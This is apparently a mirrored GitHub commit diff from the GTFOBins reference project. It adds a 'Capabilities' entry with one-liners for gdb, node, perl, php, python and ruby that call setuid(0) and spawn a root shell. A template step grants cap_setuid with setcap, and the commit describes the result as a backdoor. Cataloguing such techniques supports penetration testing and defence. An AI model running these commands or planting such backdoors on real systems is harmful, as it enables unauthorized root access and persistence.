mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Add the capabilities-enabled function
This exploits `setcap` to persist root privileges on Linux.
This commit is contained in:
commit
2e477b25de
@ -76,6 +76,13 @@ sudo-enabled:
|
|||||||
It runs in privileged context and may be used to access the file system,
|
It runs in privileged context and may be used to access the file system,
|
||||||
escalate or maintain access with elevated privileges if enabled on `sudo`.
|
escalate or maintain access with elevated privileges if enabled on `sudo`.
|
||||||
|
|
||||||
|
capabilities-enabled:
|
||||||
|
label: Capabilities
|
||||||
|
description: |
|
||||||
|
It can manipulate its process UID and in Linux systems it can be set with the
|
||||||
|
`CAP_SETUID` capability to make it work as a backdoor to maintain elevated privileges.
|
||||||
|
This also works if the binary is invoked by another binary with the capability set.
|
||||||
|
|
||||||
suid-limited:
|
suid-limited:
|
||||||
label: Limited SUID
|
label: Limited SUID
|
||||||
description: |
|
description: |
|
||||||
|
@ -12,4 +12,7 @@ functions:
|
|||||||
gdb -nx -ex "dump value $LFILE \"DATA\"" -ex quit
|
gdb -nx -ex "dump value $LFILE \"DATA\"" -ex quit
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo gdb -nx -ex '!sh' -ex quit
|
- code: sudo gdb -nx -ex '!sh' -ex quit
|
||||||
|
capabilities-enabled:
|
||||||
|
- description: Only if it has been compiled with Python support.
|
||||||
|
code: ./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit
|
||||||
---
|
---
|
||||||
|
@ -30,4 +30,7 @@ functions:
|
|||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: |
|
- code: |
|
||||||
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||||
|
capabilities-enabled:
|
||||||
|
- code: |
|
||||||
|
./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||||
---
|
---
|
||||||
|
@ -12,4 +12,6 @@ functions:
|
|||||||
- code: ./perl -e 'exec "/bin/sh";'
|
- code: ./perl -e 'exec "/bin/sh";'
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo perl -e 'exec "/bin/sh";'
|
- code: sudo perl -e 'exec "/bin/sh";'
|
||||||
|
capabilities-enabled:
|
||||||
|
- code: ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
|
||||||
---
|
---
|
||||||
|
@ -46,4 +46,8 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
CMD="/bin/sh"
|
CMD="/bin/sh"
|
||||||
sudo php -r "system('$CMD');"
|
sudo php -r "system('$CMD');"
|
||||||
|
capabilities-enabled:
|
||||||
|
- code: |
|
||||||
|
CMD="/bin/sh"
|
||||||
|
./php -r "posix_setuid(0); system('$CMD');"
|
||||||
---
|
---
|
||||||
|
@ -34,4 +34,6 @@ functions:
|
|||||||
- code: ./python2 -c 'import os; os.system("/bin/sh -p")'
|
- code: ./python2 -c 'import os; os.system("/bin/sh -p")'
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo python2 -c 'import os; os.system("/bin/sh")'
|
- code: sudo python2 -c 'import os; os.system("/bin/sh")'
|
||||||
|
capabilities-enabled:
|
||||||
|
- code: ./python2 -c 'import os; os.setuid(0); os.system("/bin/sh")'
|
||||||
---
|
---
|
||||||
|
@ -34,4 +34,6 @@ functions:
|
|||||||
- code: ./python3 -c 'import os; os.system("/bin/sh -p")'
|
- code: ./python3 -c 'import os; os.system("/bin/sh -p")'
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
|
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
|
||||||
|
capabilities-enabled:
|
||||||
|
- code: ./python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
|
||||||
---
|
---
|
||||||
|
@ -29,4 +29,6 @@ functions:
|
|||||||
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo ruby -e 'exec "/bin/sh"'
|
- code: sudo ruby -e 'exec "/bin/sh"'
|
||||||
|
capabilities-enabled:
|
||||||
|
- code: ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"'
|
||||||
---
|
---
|
||||||
|
@ -30,6 +30,10 @@ layout: common
|
|||||||
cp $(which {{ bin_name }}) .
|
cp $(which {{ bin_name }}) .
|
||||||
sudo sh -c 'chown 0 ./{{ bin_name }}; chmod +s ./{{ bin_name }}'
|
sudo sh -c 'chown 0 ./{{ bin_name }}; chmod +s ./{{ bin_name }}'
|
||||||
{% endif %}
|
{% endif %}
|
||||||
|
{%- if function_name == 'capabilities-enabled' %}
|
||||||
|
cp $(which {{ bin_name }}) .
|
||||||
|
sudo setcap cap_setuid+ep {{ bin_name }}
|
||||||
|
{% endif %}
|
||||||
{{ example.code }}
|
{{ example.code }}
|
||||||
{% endcapture %}
|
{% endcapture %}
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user